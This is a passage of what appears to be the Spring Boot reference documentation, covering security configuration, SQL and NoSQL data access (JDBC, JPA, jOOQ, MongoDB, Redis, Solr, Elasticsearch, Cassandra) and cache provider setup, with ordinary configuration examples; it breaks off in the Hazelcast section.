To customize the access rules or paths to protect, so you can add a "`home`" page for
instance, `@EnableOAuth2Sso` can be added to a `WebSecurityConfigurerAdapter` and the
annotation will cause it to be decorated and enhanced with the necessary pieces to get
the `/login` path working. For example, here we simply allow unauthenticated access
to the home page at "/" and keep the default for everything else:

[source,java,indent=0]
----
	@Configuration
	public class WebSecurityConfiguration extends WebSecurityConfigurerAdapter {

		@Override
		public void configure(WebSecurity web) {
			web.ignoring().antMatchers("/");
		}

		@Override
		protected void configure(HttpSecurity http) throws Exception {
			http.antMatcher("/**").authorizeRequests().anyRequest().authenticated();
		}

	}
----



[[boot-features-security-actuator]]
=== Actuator Security
If the Actuator is also in use, you will find:

* The management endpoints are secure even if the application endpoints are unsecure.
* Security events are transformed into `AuditEvents` and published to the `AuditService`.
* The default user will have the `ADMIN` role as well as the `USER` role.

The Actuator security features can be modified using external properties
(`+management.security.*+`). To override the application access rules
add a `@Bean` of type `WebSecurityConfigurerAdapter` and use
`@Order(SecurityProperties.ACCESS_OVERRIDE_ORDER)` if you _don't_ want to override
the actuator access rules, or `@Order(ManagementServerProperties.ACCESS_OVERRIDE_ORDER)`
if you _do_ want to override the actuator access rules.



[[boot-features-sql]]
== Working with SQL databases
The Spring Framework provides extensive support for working with SQL databases, from
direct JDBC access using `JdbcTemplate` to complete '`object relational mapping`'
technologies such as Hibernate. Spring Data provides an additional level of functionality,
creating `Repository` implementations directly from interfaces and using conventions to
generate queries from your method names.



[[boot-features-configure-datasource]]
=== Configure a DataSource
Java's `javax.sql.DataSource` interface provides a standard method of working with
database connections.
Traditionally a DataSource uses a `URL` along with some
credentials to establish a database connection.



[[boot-features-embedded-database-support]]
==== Embedded Database Support
It's often convenient to develop applications using an in-memory embedded database.
Obviously, in-memory databases do not provide persistent storage; you will need to
populate your database when your application starts and be prepared to throw away
data when your application ends.

TIP: The '`How-to`' section includes a _<<howto.adoc#howto-database-initialization,
section on how to initialize a database>>_.

Spring Boot can auto-configure embedded http://www.h2database.com[H2],
http://hsqldb.org/[HSQL] and http://db.apache.org/derby/[Derby] databases. You don't need
to provide any connection URLs; simply include a build dependency to the embedded database
that you want to use.

For example, typical POM dependencies would be:

[source,xml,indent=0]
----
	<dependency>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-data-jpa</artifactId>
	</dependency>
	<dependency>
		<groupId>org.hsqldb</groupId>
		<artifactId>hsqldb</artifactId>
		<scope>runtime</scope>
	</dependency>
----

TIP: If you're using H2 and, for whatever reason, you do configure its connection URL,
care should be taken to disable the database's automatic shutdown using
`DB_CLOSE_ON_EXIT=FALSE`. This allows Spring Boot to control when the database is closed,
thereby ensuring that it happens once access to the database is no longer needed.

NOTE: You need a dependency on `spring-jdbc` for an embedded database to be
auto-configured. In this example it's pulled in transitively via
`spring-boot-starter-data-jpa`.



[[boot-features-connect-to-production-database]]
==== Connection to a production database
Production database connections can also be auto-configured using a pooling `DataSource`.
Here's the algorithm for choosing a specific implementation:

* We prefer the Tomcat pooling `DataSource` for its performance and concurrency, so if
  that is available we always choose it.
* If HikariCP is available we will use it.
* If Commons DBCP is available we will use it, but we don't recommend it in production.
* Lastly, if Commons DBCP2 is available we will use it.

If you use the `spring-boot-starter-jdbc` or `spring-boot-starter-data-jpa`
'`starter POMs`' you will automatically get a dependency to `tomcat-jdbc`.

NOTE: You can bypass that algorithm completely and specify the connection pool to use via
the `spring.datasource.type` property. Also, additional connection pools can always be
configured manually. If you define your own `DataSource` bean, auto-configuration will
not occur.

DataSource configuration is controlled by external configuration properties in
`+spring.datasource.*+`. For example, you might declare the following section in
`application.properties`:

[source,properties,indent=0]
----
	spring.datasource.url=jdbc:mysql://localhost/test
	spring.datasource.username=dbuser
	spring.datasource.password=dbpass
	spring.datasource.driver-class-name=com.mysql.jdbc.Driver
----

See {sc-spring-boot-autoconfigure}/jdbc/DataSourceProperties.{sc-ext}[`DataSourceProperties`]
for more of the supported options.
Note also that you can configure any of the
`DataSource` implementation-specific properties via `+spring.datasource.*+`: refer to the
documentation of the connection pool implementation you are using for more details.

TIP: You often won't need to specify the `driver-class-name` since Spring Boot can deduce
it for most databases from the `url`.

NOTE: For a pooling `DataSource` to be created we need to be able to verify that a valid
`Driver` class is available, so we check for that before doing anything. I.e. if you set
`spring.datasource.driverClassName=com.mysql.jdbc.Driver` then that class has to be
loadable.



[[boot-features-connecting-to-a-jndi-datasource]]
==== Connection to a JNDI DataSource
If you are deploying your Spring Boot application to an Application Server you might want
to configure and manage your DataSource using your Application Server's built-in features
and access it using JNDI.

The `spring.datasource.jndi-name` property can be used as an alternative to the
`spring.datasource.url`, `spring.datasource.username` and `spring.datasource.password`
properties to access the `DataSource` from a specific JNDI location. For example, the
following section in `application.properties` shows how you can access a JBoss AS defined
`DataSource`:

[source,properties,indent=0]
----
	spring.datasource.jndi-name=java:jboss/datasources/customers
----



[[boot-features-using-jdbc-template]]
=== Using JdbcTemplate
Spring's `JdbcTemplate` and `NamedParameterJdbcTemplate` classes are auto-configured and
you can `@Autowire` them directly into your own beans:

[source,java,indent=0]
----
	import org.springframework.beans.factory.annotation.Autowired;
	import org.springframework.jdbc.core.JdbcTemplate;
	import org.springframework.stereotype.Component;

	@Component
	public class MyBean {

		private final JdbcTemplate jdbcTemplate;

		@Autowired
		public MyBean(JdbcTemplate jdbcTemplate) {
			this.jdbcTemplate = jdbcTemplate;
		}

		// ...

	}
----
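
For example, a minimal usage sketch inside a bean like the one above (the `USERS` table
is hypothetical):

[source,java,indent=0]
----
	public int countUsers() {
		// query for a single scalar value
		return this.jdbcTemplate.queryForObject("SELECT COUNT(*) FROM USERS", Integer.class);
	}
----
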

[[boot-features-jpa-and-spring-data]]
=== JPA and '`Spring Data`'
The Java Persistence API is a standard technology that allows you to '`map`' objects to
relational databases. The `spring-boot-starter-data-jpa` POM provides a quick way to get
started. It provides the following key dependencies:

* Hibernate -- One of the most popular JPA implementations.
* Spring Data JPA -- Makes it easy to implement JPA-based repositories.
* Spring ORMs -- Core ORM support from the Spring Framework.

TIP: We won't go into too many details of JPA or Spring Data here. You can follow the
http://spring.io/guides/gs/accessing-data-jpa/['`Accessing Data with JPA`'] guide from
http://spring.io and read the http://projects.spring.io/spring-data-jpa/[Spring Data JPA]
and http://hibernate.org/orm/documentation/[Hibernate] reference documentation.



[[boot-features-entity-classes]]
==== Entity Classes
Traditionally, JPA '`Entity`' classes are specified in a `persistence.xml` file. With
Spring Boot this file is not necessary and instead '`Entity Scanning`' is used. By default
all packages below your main configuration class (the one annotated with
`@EnableAutoConfiguration` or `@SpringBootApplication`) will be searched.

Any classes annotated with `@Entity`, `@Embeddable` or `@MappedSuperclass` will be
considered. A typical entity class would look something like this:

[source,java,indent=0]
----
	package com.example.myapp.domain;

	import java.io.Serializable;
	import javax.persistence.*;

	@Entity
	public class City implements Serializable {

		@Id
		@GeneratedValue
		private Long id;

		@Column(nullable = false)
		private String name;

		@Column(nullable = false)
		private String state;

		// ... additional members, often include @OneToMany mappings

		protected City() {
			// no-args constructor required by JPA spec
			// this one is protected since it shouldn't be used directly
		}

		public City(String name, String state) {
			this.name = name;
			this.state = state;
		}

		public String getName() {
			return this.name;
		}

		public String getState() {
			return this.state;
		}

		// ... etc

	}
----

TIP: You can customize entity scanning locations using the `@EntityScan` annotation. See
the _<<howto.adoc#howto-separate-entity-definitions-from-spring-configuration>>_ how-to.



[[boot-features-spring-data-jpa-repositories]]
==== Spring Data JPA Repositories
Spring Data JPA repositories are interfaces that you can define to access data. JPA
queries are created automatically from your method names. For example, a `CityRepository`
interface might declare a `findAllByState(String state)` method to find all cities in a
given state.

For more complex queries you can annotate your method using Spring Data's
{spring-data-javadoc}/repository/Query.html[`Query`] annotation.

Spring Data repositories usually extend from the
{spring-data-commons-javadoc}/repository/Repository.html[`Repository`] or
{spring-data-commons-javadoc}/repository/CrudRepository.html[`CrudRepository`] interfaces.
If you are using auto-configuration, repositories will be searched from the package
containing your main configuration class (the one annotated with
`@EnableAutoConfiguration` or `@SpringBootApplication`) down.

Here is a typical Spring Data repository:

[source,java,indent=0]
----
	package com.example.myapp.domain;

	import org.springframework.data.domain.*;
	import org.springframework.data.repository.*;

	public interface CityRepository extends Repository<City, Long> {

		Page<City> findAll(Pageable pageable);

		City findByNameAndStateAllIgnoringCase(String name, String state);

	}
----

TIP: We have barely scratched the surface of Spring Data JPA. For complete details check
their http://projects.spring.io/spring-data-jpa/[reference documentation].



[[boot-features-creating-and-dropping-jpa-databases]]
==== Creating and dropping JPA databases
By default, JPA databases will be automatically created *only* if you use an embedded
database (H2, HSQL or Derby). You can explicitly configure JPA settings using
`+spring.jpa.*+` properties. For example, to create and drop tables you can add the
following to your `application.properties`.

[indent=0]
----
	spring.jpa.hibernate.ddl-auto=create-drop
----

NOTE: Hibernate's own internal property name for this (if you happen to remember it
better) is `hibernate.hbm2ddl.auto`. You can set it, along with other Hibernate native
properties, using `+spring.jpa.properties.*+` (the prefix is stripped before adding them
to the entity manager).
Example:

[indent=0]
----
	spring.jpa.properties.hibernate.globally_quoted_identifiers=true
----

passes `hibernate.globally_quoted_identifiers` to the Hibernate entity manager.

By default the DDL execution (or validation) is deferred until the `ApplicationContext`
has started. There is also a `spring.jpa.generate-ddl` flag, but it is not used if
Hibernate auto-configuration is active because the `ddl-auto` settings are more
fine-grained.



[[boot-features-sql-h2-console]]
=== Using H2's web console
The http://www.h2database.com[H2 database] provides a
http://www.h2database.com/html/quickstart.html#h2_console[browser-based console] that
Spring Boot can auto-configure for you. The console will be auto-configured when the
following conditions are met:

* You are developing a web application
* `com.h2database:h2` is on the classpath
* You are using <<using-spring-boot.adoc#using-boot-devtools,Spring Boot's developer
  tools>>

TIP: If you are not using Spring Boot's developer tools, but would still like to make use
of H2's console, then you can do so by configuring the `spring.h2.console.enabled`
property with a value of `true`. The H2 console is only intended for use during
development so care should be taken to ensure that `spring.h2.console.enabled` is not set
to `true` in production.



[[boot-features-sql-h2-console-custom-path]]
==== Changing the H2 console's path
By default the console will be available at `/h2-console`. You can customize the console's
path using the `spring.h2.console.path` property.



[[boot-features-sql-h2-console-securing]]
==== Securing the H2 console
When Spring Security is on the classpath and basic auth is enabled, the H2 console will be
automatically secured using basic auth. The following properties can be used to customize
the security configuration:

* `security.user.role`
* `security.basic.authorize-mode`
* `security.basic.enabled`
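
Putting these properties together, a minimal `application.properties` sketch (the custom
path is illustrative) that enables the console without the developer tools and moves it
off the default path:

[source,properties,indent=0]
----
	spring.h2.console.enabled=true
	spring.h2.console.path=/h2
----
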

[[boot-features-jooq]]
== Using jOOQ
Java Object Oriented Querying (http://www.jooq.org/[jOOQ]) is a popular product from
http://www.datageekery.com/[Data Geekery] which generates Java code from your
database, and lets you build type-safe SQL queries through its fluent API. Both the
commercial and open source editions can be used with Spring Boot.



=== Code Generation
In order to use jOOQ type-safe queries, you need to generate Java classes from your
database schema. You can follow the instructions in the
http://www.jooq.org/doc/3.6/manual-single-page/#jooq-in-7-steps-step3[jOOQ user manual].
If you are using the `jooq-codegen-maven` plugin (and you also use the
`spring-boot-starter-parent` "`parent POM`") you can safely omit the plugin's `<version>`
tag. You can also use Spring Boot defined version variables (e.g. `h2.version`) to
declare the plugin's database dependency. Here's an example:

[source,xml,indent=0]
----
	<plugin>
		<groupId>org.jooq</groupId>
		<artifactId>jooq-codegen-maven</artifactId>
		<executions>
			...
		</executions>
		<dependencies>
			<dependency>
				<groupId>com.h2database</groupId>
				<artifactId>h2</artifactId>
				<version>${h2.version}</version>
			</dependency>
		</dependencies>
		<configuration>
			<jdbc>
				<driver>org.h2.Driver</driver>
				<url>jdbc:h2:~/yourdatabase</url>
			</jdbc>
			<generator>
				...
			</generator>
		</configuration>
	</plugin>
----



=== Using DSLContext
The fluent API offered by jOOQ is initiated via the `org.jooq.DSLContext` interface.
Spring Boot will auto-configure a `DSLContext` as a Spring Bean and connect it to your
application `DataSource`. To use the `DSLContext` you can just `@Autowire` it:

[source,java,indent=0]
----
	@Component
	public class JooqExample implements CommandLineRunner {

		private final DSLContext create;

		@Autowired
		public JooqExample(DSLContext dslContext) {
			this.create = dslContext;
		}

	}
----

TIP: The jOOQ manual tends to use a variable named `create` to hold the `DSLContext`, so
we've done the same for this example.

You can then use the `DSLContext` to construct your queries:

[source,java,indent=0]
----
	public List<GregorianCalendar> authorsBornAfter1980() {
		return this.create.selectFrom(AUTHOR)
			.where(AUTHOR.DATE_OF_BIRTH.greaterThan(new GregorianCalendar(1980, 0, 1)))
			.fetch(AUTHOR.DATE_OF_BIRTH);
	}
----



=== Customizing jOOQ
You can customize the SQL dialect used by jOOQ by setting `spring.jooq.sql-dialect` in
your `application.properties`. For example, to specify Postgres you would add:

[source,properties,indent=0]
----
	spring.jooq.sql-dialect=Postgres
----

More advanced customizations can be achieved by defining your own `@Bean` definitions
which will be used when the jOOQ `Configuration` is created. You can define beans for
the following jOOQ Types:

* `ConnectionProvider`
* `TransactionProvider`
* `RecordMapperProvider`
* `RecordListenerProvider`
* `ExecuteListenerProvider`
* `VisitListenerProvider`

You can also create your own `org.jooq.Configuration` `@Bean` if you want to take
complete control of the jOOQ configuration.



[[boot-features-nosql]]
== Working with NoSQL technologies
Spring Data provides additional projects that help you access a variety of NoSQL
technologies including
http://projects.spring.io/spring-data-mongodb/[MongoDB],
http://projects.spring.io/spring-data-neo4j/[Neo4J],
https://github.com/spring-projects/spring-data-elasticsearch/[Elasticsearch],
http://projects.spring.io/spring-data-solr/[Solr],
http://projects.spring.io/spring-data-redis/[Redis],
http://projects.spring.io/spring-data-gemfire/[Gemfire],
http://projects.spring.io/spring-data-couchbase/[Couchbase] and
http://projects.spring.io/spring-data-cassandra/[Cassandra].
Spring Boot provides auto-configuration for Redis, MongoDB, Elasticsearch, Solr and
Cassandra; you can make use of the other projects, but you will need to configure them
yourself.
Refer to the appropriate reference documentation at
http://projects.spring.io/spring-data[projects.spring.io/spring-data].



[[boot-features-redis]]
=== Redis
http://redis.io/[Redis] is a cache, message broker and richly-featured key-value store.
Spring Boot offers basic auto-configuration for the
https://github.com/xetorthio/jedis/[Jedis] client library and abstractions on top of it
provided by https://github.com/spring-projects/spring-data-redis[Spring Data Redis]. There
is a `spring-boot-starter-redis` '`Starter POM`' for collecting the dependencies in a
convenient way.



[[boot-features-connecting-to-redis]]
==== Connecting to Redis
You can inject an auto-configured `RedisConnectionFactory`, `StringRedisTemplate` or
vanilla `RedisTemplate` instance as you would any other Spring Bean. By default the
instance will attempt to connect to a Redis server using `localhost:6379`:

[source,java,indent=0]
----
	@Component
	public class MyBean {

		private StringRedisTemplate template;

		@Autowired
		public MyBean(StringRedisTemplate template) {
			this.template = template;
		}

		// ...

	}
----

If you add a `@Bean` of your own of any of the auto-configured types it will replace the
default (except in the case of `RedisTemplate` the exclusion is based on the bean name
'`redisTemplate`' not its type). If `commons-pool2` is on the classpath you will get a
pooled connection factory by default.



[[boot-features-mongodb]]
=== MongoDB
http://www.mongodb.com/[MongoDB] is an open-source NoSQL document database that uses a
JSON-like schema instead of traditional table-based relational data. Spring Boot offers
several conveniences for working with MongoDB, including the
`spring-boot-starter-data-mongodb` '`Starter POM`'.



[[boot-features-connecting-to-mongodb]]
==== Connecting to a MongoDB database
You can inject an auto-configured `org.springframework.data.mongodb.MongoDbFactory` to
access Mongo databases. By default the instance will attempt to connect to a MongoDB
server using the URL `mongodb://localhost/test`:

[source,java,indent=0]
----
	import org.springframework.data.mongodb.MongoDbFactory;
	import com.mongodb.DB;

	@Component
	public class MyBean {

		private final MongoDbFactory mongo;

		@Autowired
		public MyBean(MongoDbFactory mongo) {
			this.mongo = mongo;
		}

		// ...

		public void example() {
			DB db = mongo.getDb();
			// ...
		}

	}
----

You can set the `spring.data.mongodb.uri` property to change the URL and configure
additional settings such as the _replica set_:

[source,properties,indent=0]
----
	spring.data.mongodb.uri=mongodb://user:secret@mongo1.example.com:12345,mongo2.example.com:23456/test
----

Alternatively, as long as you're using Mongo 2.x, specify a `host`/`port`. For example,
you might declare the following in your `application.properties`:

[source,properties,indent=0]
----
	spring.data.mongodb.host=mongoserver
	spring.data.mongodb.port=27017
----

NOTE: `spring.data.mongodb.host` and `spring.data.mongodb.port` are not supported if
you're using the Mongo 3.0 Java driver. In such cases, `spring.data.mongodb.uri` should be
used to provide all of the configuration.

TIP: If `spring.data.mongodb.port` is not specified the default of `27017` is used.
You\ncould simply delete this line from the sample above.\n\nTIP: If you aren't using Spring Data Mongo you can inject `com.mongodb.Mongo` beans\ninstead of using `MongoDbFactory`.\n\nYou can also declare your own `MongoDbFactory` or `Mongo` bean if you want to take\ncomplete control of establishing the MongoDB connection.\n\n\n\n[[boot-features-mongo-template]]\n==== MongoTemplate\nSpring Data Mongo provides a\n{spring-data-mongo-javadoc}\/core\/MongoTemplate.html[`MongoTemplate`] class that is very\nsimilar in its design to Spring's `JdbcTemplate`. As with `JdbcTemplate` Spring Boot\nauto-configures a bean for you to simply inject:\n\n[source,java,indent=0]\n----\n\timport org.springframework.beans.factory.annotation.Autowired;\n\timport org.springframework.data.mongodb.core.MongoTemplate;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate final MongoTemplate mongoTemplate;\n\n\t\t@Autowired\n\t\tpublic MyBean(MongoTemplate mongoTemplate) {\n\t\t\tthis.mongoTemplate = mongoTemplate;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nSee the `MongoOperations` Javadoc for complete details.\n\n\n\n[[boot-features-spring-data-mongo-repositories]]\n==== Spring Data MongoDB repositories\nSpring Data includes repository support for MongoDB. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data MongoDB share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that `City`\nis now a Mongo data class rather than a JPA `@Entity`, it will work in the same way.\n\n[source,java,indent=0]\n----\n\tpackage com.example.myapp.domain;\n\n\timport org.springframework.data.domain.*;\n\timport org.springframework.data.repository.*;\n\n\tpublic interface CityRepository extends Repository<City, Long> {\n\n\t\tPage<City> findAll(Pageable pageable);\n\n\t\tCity findByNameAndCountryAllIgnoringCase(String name, String country);\n\n\t}\n----\n\nTIP: For complete details of Spring Data MongoDB, including its rich object mapping\ntechnologies, refer to their http:\/\/projects.spring.io\/spring-data-mongodb\/[reference\ndocumentation].\n\n\n\n[[boot-features-mongo-embedded]]\n==== Embedded Mongo\nSpring Boot offers auto-configuration for\nhttps:\/\/github.com\/flapdoodle-oss\/de.flapdoodle.embed.mongo[Embedded Mongo]. To use\nit in your Spring Boot application add a dependency on\n`de.flapdoodle.embed:de.flapdoodle.embed.mongo`.\n\nThe port that Mongo will listen on can be configured using the `spring.data.mongodb.port`\nproperty. To use a randomly allocated free port use a value of zero. The `MongoClient`\ncreated by `MongoAutoConfiguration` will be automatically configured to use the randomly\nallocated port.\n\nIf you have SLF4J on the classpath, output produced by Mongo will be automatically routed\nto a logger named `org.springframework.boot.autoconfigure.mongo.embedded.EmbeddedMongo`.\n\nYou can declare your own `IMongodConfig` and `IRuntimeConfig` beans to take control of the\nMongo instance's configuration and logging routing.\n\n\n\n[[boot-features-gemfire]]\n=== Gemfire\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire[Spring Data Gemfire] provides\nconvenient Spring-friendly tools for accessing the\nhttp:\/\/www.gopivotal.com\/big-data\/pivotal-gemfire#details[Pivotal Gemfire] data management\nplatform. 
There is a `spring-boot-starter-data-gemfire` '`Starter POM`' for collecting the\ndependencies in a convenient way. There is currently no auto-configuration support for\nGemfire, but you can enable Spring Data Repositories with a\nhttps:\/\/github.com\/spring-projects\/spring-data-gemfire\/blob\/master\/src\/main\/java\/org\/springframework\/data\/gemfire\/repository\/config\/EnableGemfireRepositories.java[single annotation (`@EnableGemfireRepositories`)].\n\n\n\n[[boot-features-solr]]\n=== Solr\nhttp:\/\/lucene.apache.org\/solr\/[Apache Solr] is a search engine. Spring Boot offers basic\nauto-configuration for the Solr 4 client library and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-solr[Spring Data Solr]. There is\na `spring-boot-starter-data-solr` '`Starter POM`' for collecting the dependencies in a\nconvenient way.\n\nTIP: Solr 5 is currently not supported and the auto-configuration will not be enabled by\na Solr 5 dependency.\n\n\n\n[[boot-features-connecting-to-solr]]\n==== Connecting to Solr\nYou can inject an auto-configured `SolrServer` instance as you would any other Spring\nbean. By default the instance will attempt to connect to a server using\n`http:\/\/localhost:8983\/solr`:\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate SolrServer solr;\n\n\t\t@Autowired\n\t\tpublic MyBean(SolrServer solr) {\n\t\t\tthis.solr = solr;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `SolrServer` it will replace the default.\n\n\n\n[[boot-features-spring-data-solr-repositories]]\n==== Spring Data Solr repositories\nSpring Data includes repository support for Apache Solr. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Solr share the same common infrastructure;\nso you could take the JPA example from earlier and, assuming that `City` is now a\n`@SolrDocument` class rather than a JPA `@Entity`, it will work in the same way.\n\nTIP: For complete details of Spring Data Solr, refer to their\nhttp:\/\/projects.spring.io\/spring-data-solr\/[reference documentation].\n\n\n\n[[boot-features-elasticsearch]]\n=== Elasticsearch\nhttp:\/\/www.elasticsearch.org\/[Elasticsearch] is an open source, distributed,\nreal-time search and analytics engine. Spring Boot offers basic auto-configuration for\nElasticsearch and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-elasticsearch[Spring Data Elasticsearch].\nThere is a `spring-boot-starter-data-elasticsearch` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-elasticsearch]]\n==== Connecting to Elasticsearch\nYou can inject an auto-configured `ElasticsearchTemplate` or Elasticsearch `Client`\ninstance as you would any other Spring Bean. By default the instance will attempt to\nconnect to a local in-memory server (a `NodeClient` in Elasticsearch terms), but you can\nswitch to a remote server (i.e.
a `TransportClient`) by setting\n`spring.data.elasticsearch.cluster-nodes` to a comma-separated '`host:port`' list.\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate ElasticsearchTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(ElasticsearchTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `ElasticsearchTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-elasticsearch-repositories]]\n==== Spring Data Elasticsearch repositories\nSpring Data includes repository support for Elasticsearch. As with the JPA repositories\ndiscussed earlier, the basic principle is that queries are constructed for you\nautomatically based on method names.\n\nIn fact, both Spring Data JPA and Spring Data Elasticsearch share the same common\ninfrastructure; so you could take the JPA example from earlier and, assuming that\n`City` is now an Elasticsearch `@Document` class rather than a JPA `@Entity`, it will\nwork in the same way.\n\nTIP: For complete details of Spring Data Elasticsearch, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/elasticsearch\/docs\/[reference documentation].\n\n\n\n[[boot-features-cassandra]]\n=== Cassandra\nhttp:\/\/cassandra.apache.org\/[Cassandra] is an open source, distributed database management\nsystem designed to handle large amounts of data across many commodity servers. Spring Boot\noffers auto-configuration for Cassandra and abstractions on top of it provided by\nhttps:\/\/github.com\/spring-projects\/spring-data-cassandra[Spring Data Cassandra].\nThere is a `spring-boot-starter-data-cassandra` '`Starter POM`' for collecting the\ndependencies in a convenient way.\n\n\n\n[[boot-features-connecting-to-cassandra]]\n==== Connecting to Cassandra\nYou can inject an auto-configured `CassandraTemplate` or a Cassandra `Session`\ninstance as you would any other Spring Bean. The `spring.data.cassandra.*` properties\ncan be used to customize the connection. Generally you will need to provide `keyspace-name`\nand `contact-points` properties:\n\n[source,properties,indent=0]\n----\n\tspring.data.cassandra.keyspace-name=mykeyspace\n\tspring.data.cassandra.contact-points=cassandrahost1,cassandrahost2\n----\n\n[source,java,indent=0]\n----\n\t@Component\n\tpublic class MyBean {\n\n\t\tprivate CassandraTemplate template;\n\n\t\t@Autowired\n\t\tpublic MyBean(CassandraTemplate template) {\n\t\t\tthis.template = template;\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\nIf you add a `@Bean` of your own of type `CassandraTemplate` it will replace the\ndefault.\n\n\n\n[[boot-features-spring-data-cassandra-repositories]]\n==== Spring Data Cassandra repositories\nSpring Data includes basic repository support for Cassandra. Currently this is more\nlimited than the JPA repositories discussed earlier, and you will need to annotate finder\nmethods with `@Query`.\n\nTIP: For complete details of Spring Data Cassandra, refer to their\nhttp:\/\/docs.spring.io\/spring-data\/cassandra\/docs\/[reference documentation].
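\nFor illustration, a repository with an annotated finder might look like the following sketch (the `city` table and the `?0` positional placeholder are assumptions based on the JPA example from earlier; check the Spring Data Cassandra documentation for the exact query syntax supported by your version):\n\n[source,java,indent=0]\n----\n\timport java.util.List;\n\n\timport org.springframework.data.cassandra.repository.Query;\n\timport org.springframework.data.repository.Repository;\n\n\tpublic interface CityRepository extends Repository<City, String> {\n\n\t\t\/\/ finder methods must be backed by an explicit CQL query\n\t\t@Query(\"SELECT * FROM city WHERE state = ?0\")\n\t\tList<City> findByState(String state);\n\n\t}\n----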
\n\n\n\n[[boot-features-caching]]\n== Caching\nThe Spring Framework provides support for transparently adding caching to an application.\nAt its core, the abstraction applies caching to methods, thus reducing the number of\nexecutions based on the information available in the cache. The caching logic is applied\ntransparently, without any interference to the invoker.\n\nNOTE: Check the {spring-reference}\/#cache[relevant section] of the Spring Framework\nreference for more details.\n\nIn a nutshell, adding caching to an operation of your service is as easy as adding the\nrelevant annotation to its method:\n\n[source,java,indent=0]\n----\n\timport javax.cache.annotation.CacheResult;\n\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MathService {\n\n\t\t@CacheResult\n\t\tpublic int computePiDecimal(int i) {\n\t\t\t\/\/ ...\n\t\t}\n\n\t}\n----\n\nNOTE: You can either use the standard JSR-107 (JCache) annotations or Spring's own\ncaching annotations transparently. We strongly advise you, however, not to mix and match\nthem.\n\nTIP: It is also possible to {spring-reference}\/#cache-annotations-put[update] or\n{spring-reference}\/#cache-annotations-evict[evict] data from the cache transparently.\n\n\n\n=== Supported cache providers\nThe cache abstraction does not provide an actual store and relies on an abstraction\nmaterialized by the `org.springframework.cache.Cache` and\n`org.springframework.cache.CacheManager` interfaces. Spring Boot auto-configures a\nsuitable `CacheManager` according to the implementation as long as the caching support is\nenabled via the `@EnableCaching` annotation.\n\nTIP: Use the `spring-boot-starter-cache` \"`Starter POM`\" to quickly add required caching\ndependencies. If you are adding dependencies manually you should note that certain\nimplementations are only provided by the `spring-context-support` jar.\n\nSpring Boot tries to detect the following providers (in this order):\n\n* <<boot-features-caching-provider-generic,Generic>>\n* <<boot-features-caching-provider-jcache,JCache (JSR-107)>>\n* <<boot-features-caching-provider-ehcache2,EhCache 2.x>>\n* <<boot-features-caching-provider-hazelcast,Hazelcast>>\n* <<boot-features-caching-provider-infinispan,Infinispan>>\n* <<boot-features-caching-provider-redis,Redis>>\n* <<boot-features-caching-provider-guava,Guava>>\n* <<boot-features-caching-provider-simple,Simple>>\n\nIt is also possible to _force_ a particular cache provider by setting the\n`spring.cache.type` property.
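\nFor instance, the following setting would force the simple in-memory provider even when richer implementations are present on the classpath (`simple` is one of the values accepted by this property, matching the provider names listed above):\n\n[source,properties,indent=0]\n----\n\t# bypass provider detection and use the ConcurrentHashMap-based store\n\tspring.cache.type=simple\n----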
\n\n\n\n[[boot-features-caching-provider-generic]]\n==== Generic\nGeneric caching is used if the context defines _at least_ one\n`org.springframework.cache.Cache` bean; in that case, a `CacheManager` wrapping them is\nconfigured.\n\n\n\n[[boot-features-caching-provider-jcache]]\n==== JCache\nJCache is bootstrapped via the presence of a `javax.cache.spi.CachingProvider` on the\nclasspath (i.e. a JSR-107 compliant caching library). It might happen that more than one\nprovider is present, in which case the provider must be explicitly specified. Even if the\nJSR-107 standard does not enforce a standardized way to define the location of the\nconfiguration file, Spring Boot does its best to accommodate implementation details.\n\n[source,properties,indent=0]\n----\n\t# Only necessary if more than one provider is present\n\tspring.cache.jcache.provider=com.acme.MyCachingProvider\n\tspring.cache.jcache.config=classpath:acme.xml\n----\n\nNOTE: Since a cache library may offer both a native implementation and JSR-107 support\nSpring Boot will prefer the JSR-107 support so that the same features are available if\nyou switch to a different JSR-107 implementation.\n\nThere are several ways to customize the underlying `javax.cache.CacheManager`:\n\n* Caches can be created on startup via the `spring.cache.cache-names` property. If a custom\n`javax.cache.configuration.Configuration` bean is defined, it is used to customize them.\n* `org.springframework.boot.autoconfigure.cache.JCacheManagerCustomizer` beans are\ninvoked with the reference of the `CacheManager` for full customization.\n\nTIP: If a standard `javax.cache.CacheManager` bean is defined, it is wrapped\nautomatically in a `org.springframework.cache.CacheManager` implementation that the\nabstraction expects. No further customization is applied on it.\n\n\n\n[[boot-features-caching-provider-ehcache2]]\n==== EhCache 2.x\nEhCache 2.x is used if a file named `ehcache.xml` can be found at the root of the\nclasspath. If EhCache 2.x and such a file are present, they are used to bootstrap the\ncache manager. An alternative configuration file can be provided as well using:\n\n[source,properties,indent=0]\n----\n\tspring.cache.ehcache.config=classpath:config\/another-config.xml\n----\n\n\n\n[[boot-features-caching-provider-hazelcast]]\n==== Hazelcast\n\nSpring Boot has <<boot-features-hazelcast,general support for Hazelcast>>. If\na `HazelcastInstance` has been auto-configured, it is automatically wrapped in a\n`CacheManager`.\n\nIf for some reason you need a different `HazelcastInstance` for 